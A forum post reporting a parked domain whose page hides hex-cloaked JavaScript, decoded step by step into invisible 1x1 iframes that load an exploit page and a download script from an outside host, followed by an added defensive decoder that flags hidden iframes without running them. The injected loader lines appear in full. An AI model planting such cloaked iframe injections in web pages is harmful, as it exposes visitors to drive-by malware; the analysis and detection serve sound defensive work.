I stumbled upon a seemingly empty site. One of those where whatever it was before, it is now no more
except for a domain name now offered for sale. Literally it says "This domain name is for sale. Click
Here to inquire." All quite innocuous, except I notice two, rather out of place, tiny gray squares at
the end of the text and wonder what they are for. When I go into the source, I see, surprisingly,
two lines of 'hex-cloaked' JavaScript, namely:
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%6d%65%64%69%61%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%6d%65%64%69%61%63%6f%75%6e%74%2e%6e%65%74%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
When I decode these, they become
document.write('<iframe src=http://mediacount.net/strong/050/ width=1 height=1></iframe>');
document.write('<iframe src=http://mediacount.net/dl/newnew.php?adv=50 width=1 height=1></iframe>');
Now I wonder what this is about. So I go to the first link and all I get is another page, blank except
for one of those little squares. Going into the source, it's another hex-encoded line:
document.write(unescape("%3c%73%74%79%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%33%32%34%31%32%33%2e%68%74%6d%22%29%7d%20%3c%2f%73%74%79%6c%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e"));
This one in turn decodes to:
<style> * {CURSOR: url("324123.htm")} </style>
<iframe src="exp1.htm" width="1" height="1"></iframe>
I skip the CSS part and just paste the exp1.htm onto the end of the link I'm now at, i.e. I now go to
visit http://mediacount.net/strong/050/exp1.htm. Well, now unsurprisingly, it looks just like where I
came from: a blank page with a tiny gray square. This time, though, the source contains a massively
longer hex string, about 16k of characters, which I won't bother to reproduce. And when decoded, it's
also a much more sophisticated JavaScript program which tries to do nasty things like shell executes
and program loads -- I haven't taken the time to study this one very closely, nor to trace out the other
first link.
Anyway, I have little background in any of this so really am pretty clueless as to what I've gotten
into. But it doesn't look good and where it exists in one place it undoubtedly exists in others. So if
anyone could shed a bit more light on what all this is and what, if anything, needs to be done to be
protected from it, I think a great many would be appreciative. Oh, and the starting URL where
all this began is the now apparently defunct site
http://www.erotictravel.com/
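
The manual decoding described in the post can be done statically, without running the script or visiting the links. The following is an added example, not part of the original post: it decodes unescape() arguments as plain text and lists any iframes it finds, flagging those sized 1x1 or smaller. Following nested layers goes beyond the post's case, and the function names are this example's own.

```javascript
// Added example: static triage of unescape()-cloaked script. Nothing is eval'd.
// First cloaked line quoted in the post above, held as inert text.
const SAMPLE = "eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%6d%65%64%69%61%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));";

// Any unescape('...') or unescape("...") call with a literal string argument.
const CLOAK = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;

// Decode %XX and %uXXXX escapes the way unescape() would, as plain text.
function decodePercent(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Read one attribute from a tag, whether quoted or (as in the post) unquoted.
function attr(tag, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Peel cloaking layers (bounded), collecting decoded text and every iframe seen.
function analyze(source, maxDepth = 5) {
  const layers = [], frames = [];
  let queue = [source];
  for (let depth = 0; depth <= maxDepth && queue.length; depth++) {
    const next = [];
    for (const text of queue) {
      for (const tag of text.match(/<iframe\b[^>]*>/gi) || []) {
        const w = parseInt(attr(tag, 'width'), 10);
        const h = parseInt(attr(tag, 'height'), 10);
        // A frame of 1x1 or smaller is invisible to the visitor.
        frames.push({ src: attr(tag, 'src'), hidden: w <= 1 && h <= 1, depth });
      }
      for (const m of text.matchAll(CLOAK)) next.push(decodePercent(m[2]));
    }
    layers.push(...next);
    queue = next;
  }
  return { layers, frames };
}

console.log(JSON.stringify(analyze(SAMPLE), null, 2));
```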